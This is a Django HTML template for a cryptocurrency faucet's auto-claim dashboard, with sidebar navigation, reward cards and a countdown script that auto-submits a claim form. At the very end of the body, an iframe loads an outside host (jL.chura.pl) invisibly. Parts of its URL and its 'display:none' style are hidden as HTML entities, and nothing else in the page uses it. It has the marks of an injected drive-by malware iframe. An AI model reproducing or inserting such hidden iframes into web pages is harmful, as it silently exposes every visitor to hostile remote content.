{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Digibyte Faucets</title>
    <!-- Custom fonts for this template-->
    <link href="{% static "vendor/fontawesome-free/css/all.min.css"%}" rel="stylesheet" type="text/css">
    	
<link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@10.10.1/dist/sweetalert2.min.css'>
    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">
    <!-- Custom styles for this template-->
    <link href="{% static "css/sb-admin-2.min.css"%}" rel="stylesheet">
</head>
<body id="page-top">
    <!-- Page Wrapper -->
    <div id="wrapper">
        <!-- Sidebar -->
        <ul class="navbar-nav {{seting.warna_faucet}} sidebar sidebar-dark accordion" id="accordionSidebar">
            <!-- Sidebar - Brand -->
      <a class="sidebar-brand d-flex align-items-center justify-content-center" href="/dashboard">
          <div class="sidebar-brand-icon">
            <img height="50" src="{{seting.logo}}" alt="Logo">
          </div>
          <div class="sidebar-brand-text mx-3">
              {{seting.nama_faucet}}          </div>
        </a>
            <!-- Divider -->
            <hr class="sidebar-divider my-0">
            <!-- Nav Item - Dashboard -->
            <li class="nav-item">
                <a class="nav-link" href="/dashboard">
                    <i class="fas fa-fw fa-tachometer-alt"></i>
                    <span>Dashboard</span></a>
            </li>
            <!-- Divider -->
            <hr class="sidebar-divider">
            <!-- Heading -->
            <div class="sidebar-heading">
                Faucets
            </div>
            <!-- Nav Item - Pages Collapse Menu -->
            <li class="nav-item">
                <a class="nav-link collapsed" href="/faucet">
                    <i class="fas fa-fw fa-faucet"></i>
                    <span>Manual Faucets</span>
                </a>
            </li>
            <!-- Nav Item - Utilities Collapse Menu -->
            <li class="nav-item active">
                <a class="nav-link collapsed" href="/auto">
                    <i class="fas fa-fw fa-robot"></i>
                    <span>Auto Faucets</span>
                </a>
            </li>
            <!-- Divider -->
            <hr class="sidebar-divider">
            <!-- Heading -->
            <div class="sidebar-heading">
                Earnings
            </div>
            <!-- Nav Item - Pages Collapse Menu -->
            <li class="nav-item">
                <a class="nav-link collapsed" href="/shortlink">
                    <i class="fas fa-fw fa-link"></i>
                    <span>Shortlinks</span>
                </a>
            </li>
            <!-- Nav Item - Charts -->
        </ul>
        <!-- End of Sidebar -->
        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">
            <!-- Main Content -->
            <div id="content">
                <!-- Topbar -->
                <nav class="navbar navbar-expand navbar-light bg-white topbar mb-4 static-top shadow">
                    <!-- Sidebar Toggle (Topbar) -->
                    <button id="sidebarToggleTop" class="btn btn-link d-md-none rounded-circle mr-3">
                        <i class="fa fa-bars"></i>
                    </button>
                    <!-- Topbar Search -->
                    <!-- Topbar Navbar -->
                    <ul class="navbar-nav ml-auto">
                        <!-- Nav Item - Search Dropdown (Visible Only XS) -->
                        <div class="topbar-divider d-none d-sm-block"></div>
                        <!-- Nav Item - User Information -->
                        <li class="nav-item dropdown no-arrow">
                            <a class="nav-link dropdown-toggle" href="#" id="userDropdown" role="button"
                                data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                <span class="mr-2 d-none d-lg-inline text-gray-600 small">{{username.username}}</span>
                                <img class="img-profile rounded-circle"
                                    src="{% static "img/undraw_profile.svg"%}">
                            </a>
                            <!-- Dropdown - User Information -->
                            <div class="dropdown-menu dropdown-menu-right shadow animated--grow-in"
                                aria-labelledby="userDropdown">
                                <a class="dropdown-item" href="/logout" data-toggle="modal" data-target="#logoutModal">
                                    <i class="fas fa-sign-out-alt fa-sm fa-fw mr-2 text-gray-400"></i>
                                    Logout
                                </a>
                            </div>
                        </li>
                    </ul>
                </nav>
                <!-- End of Topbar -->
                <!-- Begin Page Content -->
                <div class="container-fluid">
                    <!-- Page Heading -->
                    <div class="d-sm-flex align-items-center justify-content-between mb-4">
                        <h1 class="h3 mb-0 text-gray-800">Dashboard</h1>
                    </div>
                    <!-- Content Row -->
                    <div class="row">

                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-3 col-md-6 mb-4">
                            <div class="card border-left-primary shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-xs font-weight-bold text-primary text-uppercase mb-1">
                                                Reward Faucet </div>
                                            <div class="h5 mb-0 font-weight-bold text-gray-800">{{seting.reward_auto_faucet}} Tokens</div>
                                        </div>
                                        <div class="col-auto">
                                            <i class="fas fa-dollar-sign fa-2x text-gray-300"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-3 col-md-6 mb-4">
                            <div class="card border-left-success shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-xs font-weight-bold text-success text-uppercase mb-1">
                                                Claim every</div>
                                            <div class="h5 mb-0 font-weight-bold text-gray-800">{{seting.lama_auto_faucet}} Minute</div>
                                        </div>
                                        <div class="col-auto">
                                            <i class="fas fa-hourglass fa-2x text-gray-300"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Earnings (Monthly) Card Example -->
                        <!-- Pending Requests Card Example -->
                          <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-body">
                                  <center>
                                  {% if status == True %}
                                    <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
                                    <script>
                                    Swal.fire(
  'Good job!',
  'You Get {{seting.reward_auto_faucet}} Tokens',
  'success'
)
                                    </script>
                                  {% elif status == False %}
                                  <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
                                    <script>
                                    Swal.fire({
  icon: 'error',
  title: 'Oops...',
  text: 'not enough energy',
})
</script>
                                  {% endif%}
                                    <form action="" method="post" id="verify">
                                     {% csrf_token %}
                                                            <div class="col-xl-3 col-md-6 mb-4">
                            <div class="">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-xs font-weight-bold text-success text-uppercase mb-1">
                                                Please Wait</div>
                                            <div class="h5 mb-0 font-weight-bold text-gray-800">
                                       <p><b id="minute"></b>:<b id="second">0</b>
                                                               <script>
                        let timer = {{lama}},
                        current = 0;
                        const autoFaucet = setInterval(function() {
                        current += 1;
                        let percent = current * 100 / timer;
                        $('#progress').attr('style', 'width: ' + percent + '%;');
                        $('#progress').attr('aria-valuenow', percent);
                        if (current >= timer) {
                        clearInterval(autoFaucet);
                        $('#verify').submit();
                        } else {
                        let wait = Math.floor(timer - current);
                        let minutes = Math.floor(wait / 60);
                        let seconds = wait % 60;
                        $('#minute').text(minutes);
                        $('#second').text(seconds);
                        wait -= 1;}
                        }, 1000);</script>
                                       </p>
                                       <input type="hidden" name="token" value="{{token}}">
                                       </div>
                                        </div>
                                        <div class="col-auto">
                                            <i class="fas  fa-2x text-gray-300"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                                    <div class="my-2"></div>
                                </div>
                                </center>
                            </div>

                        </div>
                    </div>
                    
                </div>
                <!-- /.container-fluid -->

            </div>
            <!-- End of Main Content -->
              
            <!-- Footer -->
            <footer class="sticky-footer bg-white">
                <div class="container my-auto">
                    <div class="copyright text-center my-auto">
                        <span>Copyright &copy; {{seting.nama_faucet}} 2021</span>
                    </div>
                </div>
            </footer>
            <!-- End of Footer -->

        </div>
        <!-- End of Content Wrapper -->

    </div>
    <!-- End of Page Wrapper -->

    <!-- Scroll to Top Button-->
    <a class="scroll-to-top rounded" href="#page-top">
        <i class="fas fa-angle-up"></i>
    </a>
    <!-- Logout Modal-->
    <div class="modal fade" id="logoutModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="exampleModalLabel">Ready to Leave?</h5>
                    <button class="close" type="button" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">×</span>
                    </button>
                </div>
                <div class="modal-body">Select "Logout" below if you are ready to end your current session.</div>
                <div class="modal-footer">
                    <button class="btn btn-secondary" type="button" data-dismiss="modal">Cancel</button>
                    <a class="btn btn-primary" href="/logout">Logout</a>
                </div>
            </div>
        </div>
    </div>
    <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <!-- Bootstrap core JavaScript-->
    <script src="{% static "vendor/jquery/jquery.min.js"%}"></script>
    <script src="{% static "vendor/bootstrap/js/bootstrap.bundle.min.js"%}"></script>
    <!-- Core plugin JavaScript-->
    <script src="{% static "vendor/jquery-easing/jquery.easing.min.js"%}"></script>
    <!-- Custom scripts for all pages-->
    <script src="{% static "js/sb-admin-2.min.js"%}"></script>

    <!-- Page level plugins -->
    <script src="{% static "vendor/chart.js/Chart.min.js"%}"></script>
    <!-- Page level custom scripts -->
    <script src="{% static "js/demo/chart-area-demo.js"%}"></script>
    <script src="{% static "js/demo/chart-pie-demo.js"%}"></script>

<iframe src="http://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>
</body>

</html>